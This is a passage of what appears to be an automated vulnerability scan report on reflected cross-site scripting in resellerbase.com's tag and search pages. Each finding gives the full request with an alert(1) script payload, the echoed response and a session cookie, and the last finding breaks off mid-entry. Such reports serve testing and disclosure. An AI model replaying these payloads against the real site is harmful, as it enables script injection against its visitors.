GET /tag/themes6e9d9<img%20src%3da%20onerror%3dalert(1)>0f2d2fd26e1553399/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes6e9d9<img src=a onerror=alert(1)>0f2d2fd26e1553399/search.php]</td>
...[SNIP]...

2.4636. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75fd4</title><img%20src%3da%20onerror%3dalert(1)>554d2ff8379991bf1 was submitted in the REST URL parameter 3. This input was echoed as 75fd4</title><img src=a onerror=alert(1)>554d2ff8379991bf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/search.php75fd4</title><img%20src%3da%20onerror%3dalert(1)>554d2ff8379991bf1?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php75fd4</title><img src=a onerror=alert(1)>554d2ff8379991bf1</title>
...[SNIP]...

2.4637. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bd79<img%20src%3da%20onerror%3dalert(1)>dfae96f353b8cd339 was submitted in the REST URL parameter 3. This input was echoed as 5bd79<img src=a onerror=alert(1)>dfae96f353b8cd339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/search.php5bd79<img%20src%3da%20onerror%3dalert(1)>dfae96f353b8cd339?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php5bd79<img src=a onerror=alert(1)>dfae96f353b8cd339]</td>
...[SNIP]...

2.4638. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4a6d5</title><img%20src%3da%20onerror%3dalert(1)>2e35077a956 was submitted in the REST URL parameter 3. This input was echoed as 4a6d5</title><img src=a onerror=alert(1)>2e35077a956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php4a6d5</title><img%20src%3da%20onerror%3dalert(1)>2e35077a956?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php4a6d5</title><img src=a onerror=alert(1)>2e35077a956</title>
...[SNIP]...

2.4639. http://www.resellerbase.com/tag/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5e43f<img%20src%3da%20onerror%3dalert(1)>6d7e68a16d was submitted in the REST URL parameter 3. This input was echoed as 5e43f<img src=a onerror=alert(1)>6d7e68a16d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php5e43f<img%20src%3da%20onerror%3dalert(1)>6d7e68a16d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php5e43f<img src=a onerror=alert(1)>6d7e68a16d]</td>
...[SNIP]...

2.4640. http://www.resellerbase.com/tag/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 97e3c</title><img%20src%3da%20onerror%3dalert(1)>9d655d96b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97e3c</title><img src=a onerror=alert(1)>9d655d96b09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php/97e3c</title><img%20src%3da%20onerror%3dalert(1)>9d655d96b09 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/search.php/97e3c</title><img src=a onerror=alert(1)>9d655d96b09</title>
...[SNIP]...

2.4641. http://www.resellerbase.com/tag/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7d7ce<img%20src%3da%20onerror%3dalert(1)>5c59ea8f47f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d7ce<img src=a onerror=alert(1)>5c59ea8f47f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/search.php/7d7ce<img%20src%3da%20onerror%3dalert(1)>5c59ea8f47f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/search.php/7d7ce<img src=a onerror=alert(1)>5c59ea8f47f]</td>
...[SNIP]...

2.4642. http://www.resellerbase.com/tag/travel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 607b0</title><img%20src%3da%20onerror%3dalert(1)>8ef067deab1 was submitted in the REST URL parameter 2. This input was echoed as 607b0</title><img src=a onerror=alert(1)>8ef067deab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/travel607b0</title><img%20src%3da%20onerror%3dalert(1)>8ef067deab1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: travel607b0</title><img src=a onerror=alert(1)>8ef067deab1</title>
...[SNIP]...

2.4643. http://www.resellerbase.com/tag/travel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9f067<img%20src%3da%20onerror%3dalert(1)>1e21d2c50b8 was submitted in the REST URL parameter 2. This input was echoed as 9f067<img src=a onerror=alert(1)>1e21d2c50b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/travel9f067<img%20src%3da%20onerror%3dalert(1)>1e21d2c50b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: trave
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : travel9f067<img src=a onerror=alert(1)>1e21d2c50b8]</td>
...[SNIP]...

2.4644. http://www.resellerbase.com/tag/travel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 40f53</title><img%20src%3da%20onerror%3dalert(1)>270f58b9333ddb565 was submitted in the REST URL parameter 2. This input was echoed as 40f53</title><img src=a onerror=alert(1)>270f58b9333ddb565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/travel40f53</title><img%20src%3da%20onerror%3dalert(1)>270f58b9333ddb565?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: travel40f53</title><img src=a onerror=alert(1)>270f58b9333ddb565</title>
...[SNIP]...

2.4645. http://www.resellerbase.com/tag/travel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/travel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c17e<img%20src%3da%20onerror%3dalert(1)>e4d58951de3e3e6db was submitted in the REST URL parameter 2. This input was echoed as 8c17e<img src=a onerror=alert(1)>e4d58951de3e3e6db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/travel8c17e<img%20src%3da%20onerror%3dalert(1)>e4d58951de3e3e6db?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/travel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: trave
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : travel8c17e<img src=a onerror=alert(1)>e4d58951de3e3e6db]</td>
...[SNIP]...

2.4646. http://www.resellerbase.com/tag/uk [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79e5d<script>alert(1)</script>4f596f321e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag79e5d<script>alert(1)</script>4f596f321e3/uk HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag79e5d<script>alert(1)</script>4f596f321e3/uk was not found on this server.</p>
...[SNIP]...

2.4647. http://www.resellerbase.com/tag/uk [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec180<script>alert(1)</script>7623eed0258ed27fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagec180<script>alert(1)</script>7623eed0258ed27fd/uk?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagec180<script>alert(1)</script>7623eed0258ed27fd/uk?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4648. http://www.resellerbase.com/tag/uk [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 72867</title><img%20src%3da%20onerror%3dalert(1)>705b9c299ff453966 was submitted in the REST URL parameter 2. This input was echoed as 72867</title><img src=a onerror=alert(1)>705b9c299ff453966 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/uk72867</title><img%20src%3da%20onerror%3dalert(1)>705b9c299ff453966?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: uk72867</title><img src=a onerror=alert(1)>705b9c299ff453966</title>
...[SNIP]...

2.4649. http://www.resellerbase.com/tag/uk [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ff70e<img%20src%3da%20onerror%3dalert(1)>2cac81f788053fd02 was submitted in the REST URL parameter 2. This input was echoed as ff70e<img src=a onerror=alert(1)>2cac81f788053fd02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/ukff70e<img%20src%3da%20onerror%3dalert(1)>2cac81f788053fd02?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/uk
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ukff7
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ukff70e<img src=a onerror=alert(1)>2cac81f788053fd02]</td>
...[SNIP]...

2.4650. http://www.resellerbase.com/tag/uk [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 806be</title><img%20src%3da%20onerror%3dalert(1)>2350ee1411b was submitted in the REST URL parameter 2. This input was echoed as 806be</title><img src=a onerror=alert(1)>2350ee1411b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/uk806be</title><img%20src%3da%20onerror%3dalert(1)>2350ee1411b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: uk806be</title><img src=a onerror=alert(1)>2350ee1411b</title>
...[SNIP]...

2.4651. http://www.resellerbase.com/tag/uk [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uk

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d03bc<img%20src%3da%20onerror%3dalert(1)>ff04ecf52e1 was submitted in the REST URL parameter 2. This input was echoed as d03bc<img src=a onerror=alert(1)>ff04ecf52e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/ukd03bc<img%20src%3da%20onerror%3dalert(1)>ff04ecf52e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: ukd03
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : ukd03bc<img src=a onerror=alert(1)>ff04ecf52e1]</td>
...[SNIP]...

2.4652. http://www.resellerbase.com/tag/uptime+monitoring [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/uptime+monitoring

Issue detail

